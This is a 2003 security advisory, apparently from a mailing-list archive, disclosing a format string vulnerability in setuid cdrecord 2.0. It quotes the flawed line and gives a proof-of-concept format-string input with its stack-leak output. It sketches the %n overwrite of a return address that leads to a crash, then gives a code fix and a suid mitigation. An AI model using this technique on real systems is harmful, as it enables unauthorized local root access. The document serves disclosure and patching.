[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

cdrtools2.0 Format String Vulnerability

PACKAGE           : cdrtools
VERSION           : 2.0 
SUMMARY           : Format String
SEVERITY          : local root exploit if suid (on several distros)
DATE:             : 2003-05-05

i would inform you that there is a format string vulnerability
in cdrecord 2.0 and in particular in libscg/scsiopen.c in line 273, i

   271          if (scg__open(scgp, devname) <= 0) {
   272                  if (errs && scgp->errstr)

>>>273                     js_snprintf(errs, slen, scgp->errstr);<<<<
   274                  scg_sfree(scgp);
   275                  return ((SCSI *)0);
   276          }
!-------         W A R N I N G      -----------!  
!--- this  is an exploitable vulnerability! ---!
Cdrecord is present in several distros as setuid program so this is a real
security hole.

$ ./cdrecord dev="AAAA|%x%x%x%x%x%x%x%x%x%x%x" int.c

Cdrecord 2.0 (i586-pc-linux-gnu) Copyright (C) 1995-2002 Jrg Schilling
scsidev: 'AAAABBBBCCCC|%x%x%x%x%x%x%x%x%x%x%x%x'
devname: 'AAAABBBBCCCC|%x%x%x%x%x%x%x%x%x%x%x%x'
scsibus: -2 target: -2 lun: -2
Warning: Open by 'devname' is unintentional and not supported.
./cdrecord: File o directory inesistente. Cannot open
Cannot open SCSI driver.
./cdrecord: For possible targets try 'cdrecord -scanbus'. Make sure you
are root.
as you can see th last %x refers to AAAABBBBCCC so i can use %n for
overwriting. anything i want:
e.g. i can find on the stack the location of the return address...
let's say 0xbffcffcc: 
$./cdrecord dev=`printf 
(core dump)
$ gdb   `which cdrecord`  core -q
#0  0x3f in ?? ()
(gdb) bt
#0  0x3f in ?? ()
#1  0x8065451 in scg_open ()
#2  0x8049a3b in main ()

so it's exploitable.


A. Updated package can be found on:


B. Replace line 273 of liscg/scsiopen.c with :
	 js_snprintf(errs, slen, "%s", scgp->errstr);

C. remove the suid bit with:
	chmod 755 `which cdrecord`

Stefano Di Paola


Stefano Di Paola
Software Engineer